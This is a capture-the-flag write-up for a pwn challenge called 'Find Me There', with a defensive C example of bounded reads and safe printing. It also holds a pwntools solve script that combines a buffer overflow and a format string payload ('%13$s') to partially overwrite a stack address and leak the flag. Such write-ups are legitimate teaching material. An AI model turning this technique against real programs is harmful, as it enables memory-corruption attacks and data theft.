# [EN] Find Me There
###### tags: `Writeup` `Pwn` `English`
> [name=Curious]
## Train of Thought & Solution
From `chal.c`, we can see that this problem has a buffer overflow (BOF) in `read(0, buf, 0x40)` and a format string vulnerability (FMT) in `printf(buf)`. Additionally, `flag` is a global variable, so it lives in the same PIE image as `main` and sits at a fixed offset from it.
We know that some useful addresses will be left on the stack at runtime; when this binary is executed, we see:

If we use `objdump -t chal` to check the offset of `flag` and `main`, we get:

Furthermore, the problem prints the last two bytes of the `main` address. So all we need to do is use the BOF to overwrite the last two bytes of the `main` address left on the stack with those of `flag`, and then use the FMT to print out the `flag`.
Solve script:
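As an added example (not from the writeup and not the challenge's own `chal.c`), the C snippet below puts the two defects the writeup names beside their fixed forms and carries the solve script's partial-address arithmetic through in 16-bit integers. The `0x30` buffer size, the constructed sample input and the helper names (`bounded_copy`, `safe_print`, `count_conversions`, `partial_addr`, `oversized_read_demo`) are assumptions; the symbol offsets are the ones the writeup reads from `objdump -t chal`.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Symbol offsets the writeup takes from `objdump -t chal`. */
#define MAIN_OFF 0x11a9UL
#define FLAG_OFF 0x4010UL

/*
 * The pattern the writeup describes in chal.c (reconstructed; the buffer
 * size is an assumption). Kept as a comment so the file compiles cleanly:
 *
 *     char buf[0x30];
 *     read(0, buf, 0x40);   // 16 bytes land past the end of buf (BOF)
 *     printf(buf);          // buf is the format string (FMT): %s/%n reach the stack
 */

/* Fixed form of the read: never store more than cap-1 bytes and always
 * NUL-terminate. Returns the number of bytes kept. */
size_t bounded_copy(const char *in, size_t in_len, char *buf, size_t cap) {
    if (cap == 0) return 0;
    size_t n = in_len < cap - 1 ? in_len : cap - 1;
    memcpy(buf, in, n);
    buf[n] = '\0';
    return n;
}

/* Fixed form of the print: user data is an argument, never the format, so
 * a "%13$s" in the input is printed literally instead of dereferenced. */
int safe_print(const char *buf) {
    return printf("%s\n", buf);
}

/* Counts the conversions a string would trigger if it reached a printf-family
 * sink as the format ("%%" is a literal percent, not a conversion). Handy as a
 * log-time check for inputs that hit such a sink. */
int count_conversions(const char *s) {
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        n++;
    }
    return n;
}

/* The address arithmetic from the solve script in 16 bits: with PIE only the
 * low 16 bits of main are leaked, and flag's low 16 bits follow from the fixed
 * symbol distance. The uint16_t cast is the wraparound the script's "& 0xff"
 * masks provide; without it a carry out of bit 15 gives a wrong byte pair. */
uint16_t partial_addr(uint16_t main_lo16, unsigned long main_off, unsigned long target_off) {
    return (uint16_t)(main_lo16 - main_off + target_off);
}

/* Constructed input: 0x40 bytes of 'a', the size chal.c's read() accepts,
 * copied into a 0x30-byte buffer. Returns the length that was actually kept. */
size_t oversized_read_demo(void) {
    char in[0x40];
    char buf[0x30];
    memset(in, 'a', sizeof in);
    bounded_copy(in, sizeof in, buf, sizeof buf);
    safe_print(buf);
    return strlen(buf);
}

int main(void) {
    printf("kept %zu of 0x40 bytes\n", oversized_read_demo());
    printf("conversions in \"%%13$s\": %d\n", count_conversions("%13$s"));
    /* main low 16 bits 0x51a9 -> flag 0x8010; 0xf1a9 wraps to 0x2010 */
    printf("flag lo16: %#x %#x\n",
           partial_addr(0x51a9, MAIN_OFF, FLAG_OFF),
           partial_addr(0xf1a9, MAIN_OFF, FLAG_OFF));
    return 0;
}
```

The second `partial_addr` case is the one worth remembering: when `main`'s leaked low bytes are `0xf1a9`, the sum `0xf1a9 - 0x11a9 + 0x4010` is `0x12010`, and only the truncated `0x2010` matches `flag`'s real low bytes, which is exactly why the solve script masks each byte before sending it.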
```python
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']

# r = process('./chal')
r = remote('lotuxctf.com', 10008)

# The challenge prints the last two bytes of main's address after ": ".
main_addr_partial = int(r.recvline().strip().split(b': ')[1])

# flag and main live in the same PIE image, so the symbol distance from
# objdump -t (main at 0x11a9, flag at 0x4010) yields flag's low bytes.
flag_addr_partial = main_addr_partial - 0x00000000000011a9 + 0x0000000000004010

# Payload: %13$s reads the 13th stack argument as a string, the NUL ends the
# format string, 'a' padding fills the 0x38 bytes up to the saved main
# address, and the final two bytes overwrite its low 16 bits (little-endian)
# with flag's.
r.send(b'%13$s\x00'.ljust(0x38, b'a') +
       bytes([flag_addr_partial & 0xff, (flag_addr_partial >> 8) & 0xff]))
r.interactive()
```